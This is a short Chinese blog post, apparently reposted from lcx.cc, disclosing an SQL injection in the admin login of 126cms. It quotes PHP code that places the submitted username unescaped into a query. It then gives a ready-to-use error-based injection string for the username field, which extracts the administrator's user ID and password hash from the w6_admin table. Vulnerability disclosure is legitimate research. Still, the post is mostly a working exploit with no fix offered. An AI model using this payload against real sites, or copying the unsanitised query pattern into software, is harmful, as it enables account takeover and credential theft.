By:Cond0r
看代码。。
以下是引用片段: ……若干…… ";
echo "您输入的用户名或密码有误!!!"; echo " "; $postdb["pwd"]=md5($postdb["pwd"]); $query="SELECT * FROM `w6_admin` WHERE `userid` ='".$postdb["userid"]."'"; //你懂的 $result=mysql_query($query) or die("Could not connect: " . mysql_error()); ";
echo "您输入的用户名或密码有误!!!"; echo " "; |
test:
exp:
在后台登陆的用户名输入
' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,w6_admin.userid,0x27,0x7e,w6_admin.pwd) from w6_admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1'/*
文章来源于lcx.cc:126cms后台登陆注入漏洞
ASP提取任意文件二进制数据流下载,通常遇到做文件下载站点时要用到: StrName = server.MapPath("挂机锁.exe") Response.Buffer = True Response.Clear Set ADO = Server.Crea…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论